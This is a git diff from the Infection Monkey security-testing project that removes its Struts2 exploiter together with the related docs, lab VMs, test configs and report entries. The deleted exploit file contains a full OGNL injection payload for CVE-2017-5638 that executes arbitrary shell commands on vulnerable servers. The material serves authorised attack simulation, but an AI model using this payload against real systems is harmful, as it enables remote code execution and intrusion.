diff --git a/CHANGELOG.md b/CHANGELOG.md index 089bf8930..856724536 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -54,6 +54,7 @@ Changelog](https://keepachangelog.com/en/1.0.0/). - 32-bit agents. #1675 - Log path config options. #1761 - "smb_service_name" option. #1741 +- Struts2 exploiter. #1869 ### Fixed - A bug in network map page that caused delay of telemetry log loading. #1545 diff --git a/docs/content/reference/exploiters/Struts2.md b/docs/content/reference/exploiters/Struts2.md deleted file mode 100644 index 5ce1dfe5a..000000000 --- a/docs/content/reference/exploiters/Struts2.md +++ /dev/null @@ -1,9 +0,0 @@ ---- -title: "Struts2" -date: 2020-07-14T08:42:30+03:00 -draft: false -tags: ["exploit", "linux", "windows"] ---- -### Description - -This exploit, CVE-2017-5638, utilizes the Struts 2 Java web framework. The logic is based on [VEX WOO's PoC](https://www.exploit-db.com/exploits/41570). diff --git a/envs/monkey_zoo/blackbox/config_templates/performance.py b/envs/monkey_zoo/blackbox/config_templates/performance.py index 4eb8a3243..11fcca51b 100644 --- a/envs/monkey_zoo/blackbox/config_templates/performance.py +++ b/envs/monkey_zoo/blackbox/config_templates/performance.py @@ -16,7 +16,6 @@ class Performance(ConfigTemplate): "SmbExploiter", "WmiExploiter", "SSHExploiter", - "Struts2Exploiter", "WebLogicExploiter", "HadoopExploiter", "MSSQLExploiter", @@ -27,8 +26,6 @@ class Performance(ConfigTemplate): "basic_network.network_analysis.inaccessible_subnets": [ "10.2.2.0/30", "10.2.2.8/30", - "10.2.2.24/32", - "10.2.2.23/32", "10.2.2.21/32", "10.2.2.19/32", "10.2.2.18/32", @@ -53,8 +50,6 @@ class Performance(ConfigTemplate): "10.2.2.19", "10.2.2.20", "10.2.2.21", - "10.2.2.23", - "10.2.2.24", "10.2.2.25", "10.2.3.55", "10.2.3.56", diff --git a/envs/monkey_zoo/blackbox/config_templates/struts2.py b/envs/monkey_zoo/blackbox/config_templates/struts2.py deleted file mode 100644 index 3997557b3..000000000 --- a/envs/monkey_zoo/blackbox/config_templates/struts2.py +++ /dev/null @@ -1,19 +0,0 @@ -from copy import copy - -from envs.monkey_zoo.blackbox.config_templates.base_template import BaseTemplate -from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemplate - - -class Struts2(ConfigTemplate): - - config_values = copy(BaseTemplate.config_values) - - config_values.update( - { - "basic.exploiters.exploiter_classes": ["Struts2Exploiter"], - "basic_network.scope.depth": 2, - "basic_network.scope.subnet_scan_list": ["10.2.2.23", "10.2.2.24"], - "internal.network.tcp_scanner.HTTP_PORTS": [80, 8080], - "internal.network.tcp_scanner.tcp_target_ports": [80, 8080], - } - ) diff --git a/envs/monkey_zoo/blackbox/gcp_test_machine_list.py b/envs/monkey_zoo/blackbox/gcp_test_machine_list.py index 1b5043e93..07809e24f 100644 --- a/envs/monkey_zoo/blackbox/gcp_test_machine_list.py +++ b/envs/monkey_zoo/blackbox/gcp_test_machine_list.py @@ -7,8 +7,6 @@ GCP_TEST_MACHINE_LIST = { "mssql-16", "mimikatz-14", "mimikatz-15", - "struts2-23", - "struts2-24", "tunneling-9", "tunneling-10", "tunneling-11", diff --git a/envs/monkey_zoo/blackbox/test_blackbox.py b/envs/monkey_zoo/blackbox/test_blackbox.py index 3227694f6..78e77b4c0 100644 --- a/envs/monkey_zoo/blackbox/test_blackbox.py +++ b/envs/monkey_zoo/blackbox/test_blackbox.py @@ -22,7 +22,6 @@ from envs.monkey_zoo.blackbox.config_templates.powershell_credentials_reuse impo from envs.monkey_zoo.blackbox.config_templates.smb_mimikatz import SmbMimikatz from envs.monkey_zoo.blackbox.config_templates.smb_pth import SmbPth from envs.monkey_zoo.blackbox.config_templates.ssh import Ssh -from envs.monkey_zoo.blackbox.config_templates.struts2 import Struts2 from envs.monkey_zoo.blackbox.config_templates.tunneling import Tunneling from envs.monkey_zoo.blackbox.config_templates.weblogic import Weblogic from envs.monkey_zoo.blackbox.config_templates.wmi_mimikatz import WmiMimikatz @@ -190,10 +189,6 @@ class TestMonkeyBlackbox: def test_drupal_exploiter(self, island_client): TestMonkeyBlackbox.run_exploitation_test(island_client, Drupal, "Drupal_exploiter") - @pytest.mark.skip(reason="Struts2 exploiter is deprecated") - def test_struts_exploiter(self, island_client): - TestMonkeyBlackbox.run_exploitation_test(island_client, Struts2, "Struts2_exploiter") - @pytest.mark.skip(reason="Weblogic exploiter is deprecated") def test_weblogic_exploiter(self, island_client): TestMonkeyBlackbox.run_exploitation_test(island_client, Weblogic, "Weblogic_exploiter") diff --git a/envs/monkey_zoo/blackbox/utils/config_generation_script.py b/envs/monkey_zoo/blackbox/utils/config_generation_script.py index 1bb66a080..a5521e584 100644 --- a/envs/monkey_zoo/blackbox/utils/config_generation_script.py +++ b/envs/monkey_zoo/blackbox/utils/config_generation_script.py @@ -14,7 +14,6 @@ from envs.monkey_zoo.blackbox.config_templates.powershell import PowerShell from envs.monkey_zoo.blackbox.config_templates.smb_mimikatz import SmbMimikatz from envs.monkey_zoo.blackbox.config_templates.smb_pth import SmbPth from envs.monkey_zoo.blackbox.config_templates.ssh import Ssh -from envs.monkey_zoo.blackbox.config_templates.struts2 import Struts2 from envs.monkey_zoo.blackbox.config_templates.tunneling import Tunneling from envs.monkey_zoo.blackbox.config_templates.weblogic import Weblogic from envs.monkey_zoo.blackbox.config_templates.wmi_mimikatz import WmiMimikatz @@ -45,7 +44,6 @@ CONFIG_TEMPLATES = [ SmbMimikatz, SmbPth, Ssh, - Struts2, Tunneling, Weblogic, WmiMimikatz, diff --git a/envs/monkey_zoo/docs/fullDocs.md b/envs/monkey_zoo/docs/fullDocs.md index fa786dee6..032d6ef8d 100644 --- a/envs/monkey_zoo/docs/fullDocs.md +++ b/envs/monkey_zoo/docs/fullDocs.md @@ -22,8 +22,6 @@ This document describes Infection Monkey’s test network, how to deploy and use [Nr. 19 WebLogic](#_Toc526517181)
[Nr. 21 Scan](#_Toc526517196)
[Nr. 22 Scan](#_Toc526517197)
-[Nr. 23 Struts2](#_Toc536021476)
-[Nr. 24 Struts2](#_Toc536021477)
[Nr. 25 Zerologon](#_Toc536021478)
[Nr. 3-45 Powershell](#_Toc536021479)
[Nr. 3-46 Powershell](#_Toc536021480)
@@ -776,74 +774,6 @@ Update all requirements using deployment script:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Nr. 23 Struts2

-

(10.2.2.23)

(Vulnerable)
OS:Ubuntu 16.04.05 x64
Software:

JDK,

-

struts2 2.3.15.1,

-

tomcat 9.0.0.M9

Default server’s port:8080
Server’s config:Default
Notes:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Nr. 24 Struts2

-

(10.2.2.24)

(Vulnerable)
OS:Windows 10 x64
Software:

JDK,

-

struts2 2.3.15.1,

-

tomcat 9.0.0.M9

Default server’s port:8080
Server’s config:Default
Notes:
- diff --git a/envs/monkey_zoo/terraform/images.tf b/envs/monkey_zoo/terraform/images.tf index f74f0b7d9..67610ef6c 100644 --- a/envs/monkey_zoo/terraform/images.tf +++ b/envs/monkey_zoo/terraform/images.tf @@ -99,14 +99,6 @@ data "google_compute_image" "scan-22" { name = "scan-22" project = local.monkeyzoo_project } -data "google_compute_image" "struts2-23" { - name = "struts2-23" - project = local.monkeyzoo_project -} -data "google_compute_image" "struts2-24" { - name = "struts2-24" - project = local.monkeyzoo_project -} data "google_compute_image" "zerologon-25" { name = "zerologon-25" project = local.monkeyzoo_project diff --git a/envs/monkey_zoo/terraform/monkey_zoo.tf b/envs/monkey_zoo/terraform/monkey_zoo.tf index 73ea338b3..a5ea82d06 100644 --- a/envs/monkey_zoo/terraform/monkey_zoo.tf +++ b/envs/monkey_zoo/terraform/monkey_zoo.tf @@ -480,36 +480,6 @@ resource "google_compute_instance_from_template" "scan-22" { } } -resource "google_compute_instance_from_template" "struts2-23" { - name = "${local.resource_prefix}struts2-23" - source_instance_template = local.default_ubuntu - boot_disk{ - initialize_params { - image = data.google_compute_image.struts2-23.self_link - } - auto_delete = true - } - network_interface { - subnetwork="${local.resource_prefix}monkeyzoo-main" - network_ip="10.2.2.23" - } -} - -resource "google_compute_instance_from_template" "struts2-24" { - name = "${local.resource_prefix}struts2-24" - source_instance_template = local.default_windows - boot_disk{ - initialize_params { - image = data.google_compute_image.struts2-24.self_link - } - auto_delete = true - } - network_interface { - subnetwork="${local.resource_prefix}monkeyzoo-main" - network_ip="10.2.2.24" - } -} - resource "google_compute_instance_from_template" "zerologon-25" { name = "${local.resource_prefix}zerologon-25" source_instance_template = local.default_windows diff --git a/monkey/infection_monkey/exploit/struts2.py b/monkey/infection_monkey/exploit/struts2.py deleted file mode 100644 index c576a5fbd..000000000 --- a/monkey/infection_monkey/exploit/struts2.py +++ /dev/null @@ -1,90 +0,0 @@ -""" - Implementation is based on Struts2 jakarta multiparser RCE exploit ( CVE-2017-5638 ) - code used is from https://www.exploit-db.com/exploits/41570/ - Vulnerable struts2 versions <=2.3.31 and <=2.5.10 -""" -import http.client -import logging -import re -import ssl -import urllib.error -import urllib.parse -import urllib.request -from typing import List, Tuple - -from infection_monkey.exploit.web_rce import WebRCE - -logger = logging.getLogger(__name__) - -DOWNLOAD_TIMEOUT = 300 - - -class Struts2Exploiter(WebRCE): - _EXPLOITED_SERVICE = "Struts2" - - def __init__(self, host): - super(Struts2Exploiter, self).__init__(host, None) - - def get_exploit_config(self): - exploit_config = super(Struts2Exploiter, self).get_exploit_config() - exploit_config["dropper"] = True - return exploit_config - - @staticmethod - def build_potential_urls(ip: str, ports: List[Tuple[str, bool]], extensions=None) -> List[str]: - url_list = WebRCE.build_potential_urls(ip, ports) - url_list = [Struts2Exploiter.get_redirected(url) for url in url_list] - return url_list - - @staticmethod - def get_redirected(url): - # Returns false if url is not right - headers = {"User-Agent": "Mozilla/5.0"} - request = urllib.request.Request(url, headers=headers) - try: - return urllib.request.urlopen( - request, context=ssl._create_unverified_context() # noqa: DUO122 - ).geturl() - except urllib.error.URLError: - logger.error("Can't reach struts2 server") - return False - - def exploit(self, url, cmd): - """ - :param url: Full url to send request to - :param cmd: Code to try and execute on host - :return: response - """ - cmd = re.sub(r"\\", r"\\\\", cmd) - cmd = re.sub(r"'", r"\\'", cmd) - payload = ( - "%%{(#_='multipart/form-data')." - "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." - "(#_memberAccess?" - "(#_memberAccess=#dm):" - "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." - "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." - "(#ognlUtil.getExcludedPackageNames().clear())." - "(#ognlUtil.getExcludedClasses().clear())." - "(#context.setMemberAccess(#dm))))." - "(#cmd='%s')." - "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." - "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." - "(#p=new java.lang.ProcessBuilder(#cmds))." - "(#p.redirectErrorStream(true)).(#process=#p.start())." - "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))." - "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." - "(#ros.flush())}" % cmd - ) - headers = {"User-Agent": "Mozilla/5.0", "Content-Type": payload} - try: - request = urllib.request.Request(url, headers=headers) - # Timeout added or else we would wait for all monkeys' output - page = urllib.request.urlopen(request).read() - except AttributeError: - # If url does not exist - return False - except http.client.IncompleteRead as e: - page = e.partial.decode() - - return page diff --git a/monkey/monkey_island/cc/services/config_schema/basic.py b/monkey/monkey_island/cc/services/config_schema/basic.py index a67205234..09c5d3e40 100644 --- a/monkey/monkey_island/cc/services/config_schema/basic.py +++ b/monkey/monkey_island/cc/services/config_schema/basic.py @@ -18,7 +18,6 @@ BASIC = { "WmiExploiter", "SSHExploiter", "Log4ShellExploiter", - "Struts2Exploiter", "WebLogicExploiter", "HadoopExploiter", "MSSQLExploiter", diff --git a/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py b/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py index a6e0fbd4d..7f1f3de5f 100644 --- a/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py +++ b/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py @@ -53,15 +53,6 @@ EXPLOITER_CLASSES = { "link": "https://www.guardicore.com/infectionmonkey/docs/reference" "/exploiters/sshexec/", }, - { - "type": "string", - "enum": ["Struts2Exploiter"], - "title": "Struts2 Exploiter", - "safe": True, - "info": "Exploits struts2 java web framework. CVE-2017-5638. Logic based on " - "https://www.exploit-db.com/exploits/41570 .", - "link": "https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/struts2/", - }, { "type": "string", "enum": ["WebLogicExploiter"], diff --git a/monkey/monkey_island/cc/services/reporting/aws_exporter.py b/monkey/monkey_island/cc/services/reporting/aws_exporter.py index 137b26224..5ec07ecdf 100644 --- a/monkey/monkey_island/cc/services/reporting/aws_exporter.py +++ b/monkey/monkey_island/cc/services/reporting/aws_exporter.py @@ -81,7 +81,6 @@ class AWSExporter(Exporter): "shared_passwords_domain": AWSExporter._handle_shared_passwords_domain_issue, "shared_admins_domain": AWSExporter._handle_shared_admins_domain_issue, "strong_users_on_crit": AWSExporter._handle_strong_users_on_crit_issue, - ExploiterDescriptorEnum.STRUTS2.value.class_name: AWSExporter._handle_struts2_issue, ExploiterDescriptorEnum.WEBLOGIC.value.class_name: AWSExporter._handle_weblogic_issue, ExploiterDescriptorEnum.HADOOP.value.class_name: AWSExporter._handle_hadoop_issue, } @@ -387,24 +386,6 @@ class AWSExporter(Exporter): instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, ) - @staticmethod - def _handle_struts2_issue(issue, instance_arn): - - return AWSExporter._build_generic_finding( - severity=10, - title="Struts2 servers are vulnerable to remote code execution.", - description="Upgrade Struts2 to version 2.3.32 or 2.5.10.1 or any later versions.", - recommendation="Struts2 server at {machine} ({ip_address}) is vulnerable to " - "remote code execution attack." - "The attack was made possible because the server is using an old " - "version of Jakarta based file " - "upload Multipart parser.".format( - machine=issue["machine"], ip_address=issue["ip_address"] - ), - instance_arn=instance_arn, - instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, - ) - @staticmethod def _handle_weblogic_issue(issue, instance_arn): diff --git a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py index 2425b6435..6360d7022 100644 --- a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py +++ b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py @@ -28,7 +28,6 @@ class ExploiterDescriptorEnum(Enum): SMB = ExploiterDescriptor("SmbExploiter", "SMB Exploiter", CredExploitProcessor) WMI = ExploiterDescriptor("WmiExploiter", "WMI Exploiter", CredExploitProcessor) SSH = ExploiterDescriptor("SSHExploiter", "SSH Exploiter", CredExploitProcessor) - STRUTS2 = ExploiterDescriptor("Struts2Exploiter", "Struts2 Exploiter", ExploitProcessor) WEBLOGIC = ExploiterDescriptor( "WebLogicExploiter", "Oracle WebLogic Exploiter", ExploitProcessor ) diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js b/monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js index f058a3069..2d2352c54 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js @@ -20,7 +20,6 @@ import guardicoreLogoImage from '../../images/guardicore-logo.png' import {faExclamationTriangle} from '@fortawesome/free-solid-svg-icons'; import '../../styles/App.css'; import {smbPasswordReport, smbPthReport} from './security/issues/SmbIssue'; -import {struts2IssueOverview, struts2IssueReport} from './security/issues/Struts2Issue'; import {webLogicIssueOverview, webLogicIssueReport} from './security/issues/WebLogicIssue'; import {hadoopIssueOverview, hadoopIssueReport} from './security/issues/HadoopIssue'; import {mssqlIssueOverview, mssqlIssueReport} from './security/issues/MssqlIssue'; @@ -78,11 +77,6 @@ class ReportPageComponent extends AuthComponent { }, [this.issueContentTypes.TYPE]: this.issueTypes.DANGER }, - 'Struts2Exploiter': { - [this.issueContentTypes.OVERVIEW]: struts2IssueOverview, - [this.issueContentTypes.REPORT]: struts2IssueReport, - [this.issueContentTypes.TYPE]: this.issueTypes.DANGER - }, 'WebLogicExploiter': { [this.issueContentTypes.OVERVIEW]: webLogicIssueOverview, [this.issueContentTypes.REPORT]: webLogicIssueReport, diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/security/issues/Struts2Issue.js b/monkey/monkey_island/cc/ui/src/components/report-components/security/issues/Struts2Issue.js deleted file mode 100644 index ca4c2b2b9..000000000 --- a/monkey/monkey_island/cc/ui/src/components/report-components/security/issues/Struts2Issue.js +++ /dev/null @@ -1,26 +0,0 @@ -import React from 'react'; -import CollapsibleWellComponent from '../CollapsibleWell'; - -export function struts2IssueOverview() { - return (
  • Struts2 servers are vulnerable to remote code execution. ( - CVE-2017-5638)
    • ) -} - -export function struts2IssueReport(issue) { - return ( - <> - Upgrade Struts2 to version 2.3.32 or 2.5.10.1 or any later versions. - - Struts2 server at {issue.machine} ({issue.ip_address}) is vulnerable to remote code execution attack. -
    - The attack was made possible because the server is using an old version of Jakarta based file upload - Multipart parser. For possible work-arounds and more info read here. -     - - ); -} diff --git a/monkey/tests/data_for_tests/monkey_configs/automated_master_config.json b/monkey/tests/data_for_tests/monkey_configs/automated_master_config.json index e4712defe..db8c43295 100644 --- a/monkey/tests/data_for_tests/monkey_configs/automated_master_config.json +++ b/monkey/tests/data_for_tests/monkey_configs/automated_master_config.json @@ -57,7 +57,6 @@ {"name": "DrupalExploiter", "supported_os": ["linux", "windows"], "options": {}}, {"name": "HadoopExploiter", "supported_os": ["linux", "windows"], "options": {}}, {"name": "ShellShockExploiter", "supported_os": ["linux"], "options": {}}, - {"name": "Struts2Exploiter", "supported_os": ["linux", "windows"], "options": {}}, {"name": "WebLogicExploiter", "supported_os": ["linux", "windows"], "options": {}}, {"name": "ZerologonExploiter", "supported_os": ["windows"], "options": {}} ] diff --git a/monkey/tests/data_for_tests/monkey_configs/flat_config.json b/monkey/tests/data_for_tests/monkey_configs/flat_config.json index b9dae9453..dd0b27a09 100644 --- a/monkey/tests/data_for_tests/monkey_configs/flat_config.json +++ b/monkey/tests/data_for_tests/monkey_configs/flat_config.json @@ -49,7 +49,6 @@ "SmbExploiter", "WmiExploiter", "SSHExploiter", - "Struts2Exploiter", "ZerologonExploiter", "WebLogicExploiter", "HadoopExploiter", diff --git a/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json b/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json index f0c95e5b3..4dda5f312 100644 --- a/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json +++ b/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json @@ -5,7 +5,6 @@ "SmbExploiter", "WmiExploiter", "SSHExploiter", - "Struts2Exploiter", "WebLogicExploiter", "HadoopExploiter", "MSSQLExploiter", diff --git a/monkey/tests/unit_tests/monkey_island/cc/services/test_config.py b/monkey/tests/unit_tests/monkey_island/cc/services/test_config.py index b49007eb0..b8b7ff1c3 100644 --- a/monkey/tests/unit_tests/monkey_island/cc/services/test_config.py +++ b/monkey/tests/unit_tests/monkey_island/cc/services/test_config.py @@ -202,7 +202,6 @@ def test_format_config_for_agent__exploiters(flat_monkey_config): {"name": "DrupalExploiter", "supported_os": [], "options": {}}, {"name": "HadoopExploiter", "supported_os": ["linux", "windows"], "options": {}}, {"name": "Log4ShellExploiter", "supported_os": ["linux", "windows"], "options": {}}, - {"name": "Struts2Exploiter", "supported_os": [], "options": {}}, {"name": "WebLogicExploiter", "supported_os": [], "options": {}}, {"name": "ZerologonExploiter", "supported_os": ["windows"], "options": {}}, ], diff --git a/vulture_allowlist.py b/vulture_allowlist.py index bf1244f93..4889487a2 100644 --- a/vulture_allowlist.py +++ b/vulture_allowlist.py @@ -56,7 +56,6 @@ credential_type # unused variable (monkey/monkey_island/cc/services/reporting/i password_restored # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_report_info.py:23) SSH # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:30) SAMBACRY # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:31) -STRUTS2 # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:39) WEBLOGIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:40) HADOOP # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:43) MSSQL # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:44)